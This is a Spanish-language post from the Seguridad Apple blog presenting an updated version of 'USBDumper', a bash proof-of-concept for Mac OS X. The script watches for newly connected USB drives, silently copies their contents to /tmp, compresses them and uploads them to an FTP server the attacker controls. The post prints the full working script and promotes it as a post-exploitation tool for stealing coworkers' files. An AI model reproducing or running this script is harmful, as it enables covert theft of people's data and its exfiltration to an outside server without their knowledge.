USBDumper es un pequeño script desarrollado en Octubre del año pasado para Seguridad Apple desde el equipo de auditoría de aplicaciones web de Informática64, y cuya finalidad era demostrar en una prueba de concepto (POC), que se pueden robar los datos de los pendrives que se conectan a nuestro equipo Mac OS X fácilmente, y luego sacar el "jugo" de los datos robados.
Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/.
La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube.
Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina.
De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo.
A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.
A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.
Figura 1: USB Dumper enviando el backup a la nube |
#!/bin/bash #www.seguridadapple.com SERVER="host" USERNAME="user" PASSWORD="password" function saveDefaultDevices() { rm -rf /tmp/usblist /tmp/Volumes mkdir /tmp/Volumes for vol in /Volumes/* do echo $vol >> /tmp/usblist echo "Detecting $vol as default" done } function checkDevices() { for vol in /Volumes/* do aux=`cat /tmp/usblist |grep -i "$vol"` aux=`echo $?` if [ $aux -eq 1 ]; then nombre=`echo $vol | awk -F "/" '{print $3}'` echo $vol >> /tmp/usblist mkdir "/tmp$vol"? echo "[+] Dumping $vol in /tmp$vol" sleep 1 cp -R "$vol" "/tmp/Volumes/" auxVol="/tmp/$nombre.zip" rm -rf $auxVol echo "Compressing files [ /tmp$vol in $auxVol ]" zip -r "$auxVol" "/tmp$vol" > /dev/null echo "Uploading to FTP" ftp -n -i $SERVER <<EOF user $USERNAME $PASSWORD binary put "$auxVol" "$nombre" quit EOF echo "[+] Done" fi done } saveDefaultDevices while [ 1 ]; do checkDevices sleep 1 done |
Publicado en Seguridad Apple.
Suscríbete al canal RSS a través de Feedburner.
Otros Blogs:
El lado del Mal - Punto Compartido - Windows Técnico
No hay comentarios:
Publicar un comentario